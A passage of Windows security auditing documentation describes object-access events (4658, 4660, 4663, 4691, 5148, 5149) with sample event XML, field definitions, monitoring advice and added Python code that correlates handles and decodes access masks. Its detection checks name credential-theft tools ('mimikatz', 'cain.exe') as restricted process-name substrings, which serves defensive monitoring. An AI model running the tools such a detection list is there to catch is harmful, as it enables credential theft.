Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that requested that the handle be closed. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.

Security Monitoring Recommendations

For 4658(S): The handle to an object was closed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Typically this event has little to no security relevance and is hard to parse or analyze. There is no recommendation for this event, unless you know exactly what you need to monitor with it.
This event can be used to track all actions or operations related to a specific object handle.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or “cain.exe”), check for these substrings in “Process Name.”

4660(S): An object was deleted.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Kernel Object, and Audit Registry
Event Description:
This event generates when an object was deleted. The object could be a file system, kernel, or registry object.
This event generates only if “Delete” auditing is set in object’s SACL.
This event doesn’t contain the name of the deleted object (only the Handle ID). It is better to use “4663(S): An attempt was made to access an object” with DELETE access to track object deletion.
The advantage of this event is that it’s generated only during real delete operations. In contrast, “4663(S): An attempt was made to access an object” also generates during other actions, such as object renaming.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4660</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12800</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-18T21:05:28.677152100Z" />
    <EventRecordID>270188</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="3060" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x4367b</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="HandleId">0x1678</Data>
    <Data Name="ProcessId">0xef0</Data>
    <Data Name="ProcessName">C:\Windows\explorer.exe</Data>
    <Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “delete object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “delete object” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that deleted the object. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event with other events that might contain the same Transaction ID, such as “4656(S, F): A handle to an object was requested.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.

Security Monitoring Recommendations
For 4660(S): An object was deleted.
This event doesn’t contain the name of the deleted object (only Handle ID). It is better to use “4663(S): An attempt was made to access an object.” events with DELETE access to track object deletion actions.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to monitor at the Kernel objects level.
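Handle ID is what ties 4656, 4663, 4660 and 4658 together, and 4660 itself carries no object name. The Python below is an added example, not Microsoft's code: it correlates such events on (Process ID, Handle ID) to recover the name of a deleted object and the lifetime of a handle, as the 4658 and 4660 descriptions suggest. The records in SAMPLE_EVENTS are constructed from the field names on this page with made-up times and handle values, and a 4658 whose Handle ID was not captured (0x0) is kept aside as uncorrelatable.

```python
"""Correlate handle events (4656, 4663, 4660, 4658) on Handle ID.

Added example, not Microsoft's code. Field names are the ones on this page; the
records in SAMPLE_EVENTS are constructed (times and handle values are made up).
"""
from datetime import datetime


def event_time(ev):
    """Parse TimeCreated's SystemTime (ISO 8601, seven fractional digits, 'Z')."""
    head, _, frac = ev["TimeCreated"].rstrip("Z").partition(".")
    stamp = datetime.strptime(head, "%Y-%m-%dT%H:%M:%S")
    return stamp.replace(microsecond=int((frac + "000000")[:6]))


class HandleTracker:
    """Tracks open handles keyed on (Process ID, Handle ID).

    4656/4663 name the object, 4660 marks it deleted, 4658 closes the handle
    and fixes how long it was open. A Handle ID of 0x0 means the value was not
    captured, so such events cannot be correlated and are kept separately.
    """

    def __init__(self):
        self.open = {}          # key -> record still open
        self.completed = []     # records closed by a 4658
        self.uncorrelated = []  # events with no matching open handle

    def feed(self, ev):
        if ev.get("HandleId", "0x0") == "0x0":
            self.uncorrelated.append(ev)
            return
        key = (ev["ProcessId"], ev["HandleId"])
        eid = ev["EventID"]
        record = self.open.get(key)
        if eid in (4656, 4663):
            if record is None:  # first sight of this handle; both events carry Object Name
                record = self.open[key] = {
                    "object": ev.get("ObjectName", "-"),
                    "process": ev.get("ProcessName", "-"),
                    "opened": event_time(ev),
                    "accesses": [],
                    "deleted": False,
                }
            if eid == 4663:
                record["accesses"].append(ev.get("AccessList", ""))
        elif eid == 4660:  # no object name in the event: resolve it via the open handle
            if record is None:
                self.uncorrelated.append(ev)
            else:
                record["deleted"] = True
        elif eid == 4658:
            record = self.open.pop(key, None)
            if record is None:
                self.uncorrelated.append(ev)
            else:
                record["closed"] = event_time(ev)
                record["seconds_open"] = (record["closed"] - record["opened"]).total_seconds()
                self.completed.append(record)


def correlate(events):
    """Feed events in time order and return the tracker."""
    tracker = HandleTracker()
    for ev in sorted(events, key=event_time):
        tracker.feed(ev)
    return tracker


def deleted_objects(tracker):
    """(Object Name, Process Name) for every handle on which a 4660 was seen."""
    records = tracker.completed + list(tracker.open.values())
    return [(r["object"], r["process"]) for r in records if r["deleted"]]


# Constructed records: explorer.exe (PID 0xef0) opens, deletes and closes a file
# through handle 0x1678, then a 4658 arrives whose Handle ID was not captured.
SAMPLE_EVENTS = [
    {"EventID": 4656, "TimeCreated": "2015-09-18T21:05:27.100000000Z", "ProcessId": "0xef0",
     "HandleId": "0x1678", "ProcessName": "C:\\Windows\\explorer.exe",
     "ObjectName": "C:\\Documents\\HBI Data.txt"},
    {"EventID": 4663, "TimeCreated": "2015-09-18T21:05:28.500000000Z", "ProcessId": "0xef0",
     "HandleId": "0x1678", "ProcessName": "C:\\Windows\\explorer.exe",
     "ObjectName": "C:\\Documents\\HBI Data.txt", "AccessList": "%%1537"},  # DELETE
    {"EventID": 4660, "TimeCreated": "2015-09-18T21:05:28.677152100Z", "ProcessId": "0xef0",
     "HandleId": "0x1678", "ProcessName": "C:\\Windows\\explorer.exe"},
    {"EventID": 4658, "TimeCreated": "2015-09-18T21:05:29.100000000Z", "ProcessId": "0xef0",
     "HandleId": "0x1678", "ProcessName": "C:\\Windows\\explorer.exe"},
    {"EventID": 4658, "TimeCreated": "2015-09-18T21:05:30.000000000Z", "ProcessId": "0xef0",
     "HandleId": "0x0", "ProcessName": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    tracker = correlate(SAMPLE_EVENTS)
    for obj, proc in deleted_objects(tracker):
        print("deleted:", obj, "by", proc)
    for rec in tracker.completed:
        print("handle open for %.3f s on %s" % (rec["seconds_open"], rec["object"]))
    print("uncorrelated events:", len(tracker.uncorrelated))
```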
4663(S): An attempt was made to access an object.
4/5/2019 • 8 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event indicates that a specific operation was performed on an object. The object could be a file system, kernel, or registry object, or a file system object on removable storage or a device.
This event generates only if object’s SACL has required ACE to handle specific access right use.
The main difference with “4656: A handle to an object was requested.” event is that 4663 shows that access right was used instead of just requested and 4663 doesn’t have Failure events.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4663</EventID>
    <Version>1</Version>
    <Level>0</Level>
    <Task>12800</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-18T22:13:54.770429700Z" />
    <EventRecordID>273866</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x4367b</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\Documents\HBI Data.txt</Data>
    <Data Name="HandleId">0x1bc</Data>
    <Data Name="AccessList">%%4417 %%4418</Data>
    <Data Name="AccessMask">0x6</Data>
    <Data Name="ProcessId">0x458</Data>
    <Data Name="ProcessName">C:\Windows\System32\notepad.exe</Data>
    <Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012, Windows 8. Added “Resource Attributes” field.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to access an object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to access an object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of object that was accessed during the operation.
The following table contains the list of the most common Object Types:
Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port
Object Name [Type = UnicodeString]: name and other identifying information for the object for which access was requested. For example, for a file, the path would be included.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can be used for correlation with other events, for example with Handle ID field in “4656(S, F): A handle to an object was requested.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For some objects, the field does not apply and “-” is displayed.
For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))
Impact_MS: Resource Property ID.
3000: Resource Property Value.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that accessed the object. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Access Request Information:
Accesses [Type = UnicodeString]: the list of access rights which were used by Subject\Security ID. These
access rights depend on Object Type. The following table contains information about the most common access
rights for file system objects. Access rights for registry objects are often similar to file system objects, but the
table contains a few notes about how they vary.

ACCESS | HEX VALUE, SCHEMA VALUE | DESCRIPTION

ReadData (or ListDirectory) (for registry objects, this is “Query key value.”) | 0x1, %%4416 | ReadData - For a file object, the right to read the corresponding file data. For a directory object, the right to read the corresponding directory data. ListDirectory - For a directory, the right to list the contents of the directory.

WriteData (or AddFile) (for registry objects, this is “Set key value.”) | 0x2, %%4417 | WriteData - For a file object, the right to write data to the file. For a directory object, the right to create a file in the directory (FILE_ADD_FILE). AddFile - For a directory, the right to create a file in the directory.

AppendData (or AddSubdirectory or CreatePipeInstance) | 0x4, %%4418 | AppendData - For a file object, the right to append data to the file. (For local files, write operations will not overwrite existing data if this flag is specified without FILE_WRITE_DATA.) For a directory object, the right to create a subdirectory (FILE_ADD_SUBDIRECTORY). AddSubdirectory - For a directory, the right to create a subdirectory. CreatePipeInstance - For a named pipe, the right to create a pipe.

ReadEA (for registry objects, this is “Enumerate sub-keys.”) | 0x8, %%4419 | The right to read extended file attributes.

WriteEA | 0x10, %%4420 | The right to write extended file attributes.

Execute/Traverse | 0x20, %%4421 | Execute - For a native code file, the right to execute the file. This access right given to scripts may cause the script to be executable, depending on the script interpreter. Traverse - For a directory, the right to traverse the directory. By default, users are assigned the BYPASS_TRAVERSE_CHECKING privilege, which ignores the FILE_TRAVERSE access right. See the remarks in File Security and Access Rights for more information.

DeleteChild | 0x40, %%4422 | For a directory, the right to delete a directory and all the files it contains, including read-only files.

ReadAttributes | 0x80, %%4423 | The right to read file attributes.

WriteAttributes | 0x100, %%4424 | The right to write file attributes.

DELETE | 0x10000, %%1537 | The right to delete the object.

READ_CONTROL | 0x20000, %%1538 | The right to read the information in the object's security descriptor, not including the information in the system access control list (SACL).

WRITE_DAC | 0x40000, %%1539 | The right to modify the discretionary access control list (DACL) in the object's security descriptor.

WRITE_OWNER | 0x80000, %%1540 | The right to change the owner in the object's security descriptor.

SYNCHRONIZE | 0x100000, %%1541 | The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state. Some object types do not support this access right.

ACCESS_SYS_SEC | 0x1000000, %%1542 | The ACCESS_SYS_SEC access right controls the ability to get or set the SACL in an object's security descriptor.

Table 15. File System objects access rights.

Access Mask [Type = HexInt32]: hexadecimal mask for the requested or performed operation. For more
information, see the preceding table.

Security Monitoring Recommendations

For 4663(S): An attempt was made to access an object.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to monitor at the Kernel objects level.
For other types of objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have critical file system objects for which you need to monitor all access attempts, monitor this event for Object Name.
If you have critical file system objects for which you need to monitor certain access attempts (for example, write actions), monitor this event for Object Name in relation to Access Request Information\Accesses.
If you have file system objects with specific attributes, for which you need to monitor access attempts, monitor this event for Resource Attributes.
If Object Name is a sensitive or critical registry key for which you need to monitor specific access attempts (for example, only write actions), monitor for all 4663 events with the corresponding Access Request Information\Accesses.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
For file system objects, we recommend that you monitor for these Access Request Information\Accesses rights:
WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
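The monitoring recommendations given for 4656 and for 4663, together with the Access Mask decoding described by Table 15, carried out in Python. This is an added example, not Microsoft's code: it parses the 4663 Event XML shown on this page, splits AccessMask into the Table 15 rights it contains, and flags write-type accesses, a Process Name outside the standard folders or inside a restricted one, and the restricted substrings named above. The folder and substring lists are constructed from the recommendations and are assumptions to adjust to your own estate.

```python
"""Decode a 4656/4663 Security event and apply the page's monitoring recommendations.

Added example (not Microsoft's code). Bit values follow Table 15 above; the
folder and substring lists below are constructed from the recommendations.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Table 15: file system access rights, bit value -> (name, %% schema value).
FILE_ACCESS_RIGHTS = {
    0x1: ("ReadData (or ListDirectory)", "%%4416"),
    0x2: ("WriteData (or AddFile)", "%%4417"),
    0x4: ("AppendData (or AddSubdirectory or CreatePipeInstance)", "%%4418"),
    0x8: ("ReadEA", "%%4419"),
    0x10: ("WriteEA", "%%4420"),
    0x20: ("Execute/Traverse", "%%4421"),
    0x40: ("DeleteChild", "%%4422"),
    0x80: ("ReadAttributes", "%%4423"),
    0x100: ("WriteAttributes", "%%4424"),
    0x10000: ("DELETE", "%%1537"),
    0x20000: ("READ_CONTROL", "%%1538"),
    0x40000: ("WRITE_DAC", "%%1539"),
    0x80000: ("WRITE_OWNER", "%%1540"),
    0x100000: ("SYNCHRONIZE", "%%1541"),
    0x1000000: ("ACCESS_SYS_SEC", "%%1542"),
}

# The rights the recommendations single out for file system objects.
WRITE_LIKE_RIGHTS = (0x2, 0x4, 0x10, 0x40, 0x100, 0x10000, 0x40000, 0x80000)

# Constructed lists (compared case-insensitively); adjust them to your estate.
STANDARD_FOLDERS = ("c:\\windows\\system32\\", "c:\\program files\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\",)
RESTRICTED_SUBSTRINGS = ("mimikatz", "cain.exe")


def parse_event(xml_text):
    """Return a flat dict: EventID plus every <Data Name=...> value from EventData."""
    root = ET.fromstring(xml_text)
    fields = {"EventID": int(root.find("e:System/e:EventID", NS).text)}
    for data in root.findall("e:EventData/e:Data", NS):
        fields[data.get("Name")] = data.text or ""
    return fields


def decode_access_mask(mask):
    """Split an AccessMask value into the Table 15 right names it contains."""
    names = [FILE_ACCESS_RIGHTS[bit][0] for bit in sorted(FILE_ACCESS_RIGHTS) if mask & bit]
    unknown = mask & ~sum(FILE_ACCESS_RIGHTS)  # bits Table 15 does not list
    if unknown:
        names.append("unknown bits 0x%x" % unknown)
    return names


def evaluate(fields, expected_process=None):
    """Apply the 4656/4663 recommendations to one parsed event; return findings."""
    findings = []
    process = fields.get("ProcessName", "")
    lowered = process.lower()
    mask = int(fields.get("AccessMask", "0x0"), 16)

    # Write-type rights on file system objects (WriteData, AppendData, WriteEA,
    # DeleteChild, WriteAttributes, DELETE, WRITE_DAC, WRITE_OWNER).
    used = [FILE_ACCESS_RIGHTS[bit][0] for bit in WRITE_LIKE_RIGHTS if mask & bit]
    if fields.get("ObjectType", "File") == "File" and used:
        findings.append("write-type access to %s: %s" % (fields.get("ObjectName", "?"), ", ".join(used)))

    # Process Name checks from the recommendations.
    if expected_process and lowered != expected_process.lower():
        findings.append("process name differs from the expected value: " + process)
    if lowered and not lowered.startswith(STANDARD_FOLDERS):
        findings.append("process not in a standard folder: " + process)
    if any(folder in lowered for folder in RESTRICTED_FOLDERS):
        findings.append("process in a restricted folder: " + process)
    if any(word in lowered for word in RESTRICTED_SUBSTRINGS):
        findings.append("restricted substring in process name: " + process)
    return findings


# The 4663 Event XML shown on this page, trimmed to the fields used here.
SAMPLE_4663 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4663</EventID></System>
  <EventData>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\\Documents\\HBI Data.txt</Data>
    <Data Name="AccessList">%%4417 %%4418</Data>
    <Data Name="AccessMask">0x6</Data>
    <Data Name="ProcessId">0x458</Data>
    <Data Name="ProcessName">C:\\Windows\\System32\\notepad.exe</Data>
  </EventData>
</Event>"""

if __name__ == "__main__":
    event = parse_event(SAMPLE_4663)
    print("PID", int(event["ProcessId"], 16), "rights:", decode_access_mask(int(event["AccessMask"], 16)))
    for finding in evaluate(event):
        print("finding:", finding)
```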
Audit Other Object Access Events
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Other Object Access Events allows you to monitor operations with scheduled tasks, COM+ objects and indirect object access requests.
Event volume: Low.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS

Domain Controller | Yes | Yes | Yes | Yes | We recommend Success auditing first of all because of scheduled tasks events. We recommend Failure auditing to get events about possible ICMP DoS attack.

Member Server | Yes | Yes | Yes | Yes | We recommend Success auditing first of all because of scheduled tasks events. We recommend Failure auditing to get events about possible ICMP DoS attack.

Workstation | Yes | Yes | Yes | Yes | We recommend Success auditing first of all because of scheduled tasks events. We recommend Failure auditing to get events about possible ICMP DoS attack.

Events List:
4671(-): An application attempted to access a blocked ordinal through the TBS.
4691(S): Indirect access to an object was requested.
5148(F): The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded.
5149(F): The DoS attack has subsided and normal processing is being resumed.
4698(S): A scheduled task was created.
4699(S): A scheduled task was deleted.
4700(S): A scheduled task was enabled.
4701(S): A scheduled task was disabled.
4702(S): A scheduled task was updated.
5888(S): An object in the COM+ Catalog was modified.
5889(S): An object was deleted from the COM+ Catalog.
5890(S): An object was added to the COM+ Catalog.
4671(-): An application attempted to access a blocked ordinal through the TBS.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Currently this event doesn’t generate. It is a defined event, but it is never invoked by the operating system.
Subcategory: Audit Other Object Access Events
4691(S): Indirect access to an object was requested.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event indicates that indirect access to an object was requested.
These events are generated for ALPC Ports access request actions.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4691</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12804</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-23T01:03:49.834912100Z" />
    <EventRecordID>344382</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="2928" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x36509</Data>
    <Data Name="ObjectType">ALPC Port</Data>
    <Data Name="ObjectName">\Sessions\2\Windows\DwmApiPort</Data>
    <Data Name="AccessList">%%4464</Data>
    <Data Name="AccessMask">0x1</Data>
    <Data Name="ProcessId">0xe60</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested an access to the object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested an access to the object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Type [Type = UnicodeString]: The type of an object for which access was requested.
The following table contains the list of the most common Object Types:

DIRECTORY                 EVENT          TIMER                  DEVICE
Mutant                    Type           File                   Token
Thread                    Section        WindowStation          DebugObject
FilterCommunicationPort   EventPair      Driver                 IoCompletion
Controller                SymbolicLink   WmiGuid                Process
Profile                   Desktop        KeyedEvent             Adapter
Key                       WaitablePort   Callback               Semaphore
Job                       Port           FilterConnectionPort   ALPC Port

Object Name [Type = UnicodeString]: full path and name of the object for which access was requested.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the access was
requested. Process ID (PID ) is a number used by the operating system to uniquely identify an active process.
To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Access Request Information:
Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID.
These access rights depend on Object Type. “Table 13. File access codes.” contains information about the
most common access rights for file system objects. For information about ALPC ports access rights, use
https://technet.microsoft.com/ or other informational resources.
Access Mask [Type = HexInt32]: hexadecimal mask for the operation that was requested or performed. See
“Table 13. File access codes.” for more information about file access rights. For information about ALPC
ports access rights, use https://technet.microsoft.com/ or other informational resources.

Security Monitoring Recommendations
For 4691(S): Indirect access to an object was requested.
Typically this event has little to no security relevance and is hard to parse or analyze. There is no
recommendation for this event, unless you know exactly what you need to monitor with ALPC Ports.
5148(F): The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
In most circumstances, this event occurs very rarely. It is designed to be generated when an ICMP DoS attack
starts or is detected.
There is no example of this event in this document.
Subcategory: Audit Other Object Access Events
Event Schema:
The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with
this attack will be discarded.
Network Information:

Type:%1

Required Server Roles: None.
Minimum OS Version: Windows Server 2008 R2, Windows 7.
Event Versions: 0.

Security Monitoring Recommendations
This event can be a sign of an ICMP DoS attack or, among other things, of hardware or network device related
problems. In both cases, we recommend triggering an alert and investigating the reason the event was
generated.
5149(F): The DoS attack has subsided and normal processing is being resumed.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
In most circumstances, this event occurs very rarely. It is designed to be generated when an ICMP DoS attack
has ended.
There is no example of this event in this document.
Subcategory: Audit Other Object Access Events
Event Schema:
The DoS attack has subsided and normal processing is being resumed.
Network Information:

Type:%1
Packets Discarded:%2

Required Server Roles: None.
Minimum OS Version: Windows Server 2008 R2, Windows 7.
Event Versions: 0.

Security Monitoring Recommendations
This event can be a sign of an ICMP DoS attack or, among other things, of hardware or network device related
problems. In both cases, we recommend triggering an alert and investigating the reason the event was
generated.
4698(S): A scheduled task was created.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event generates every time a new scheduled task is created.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
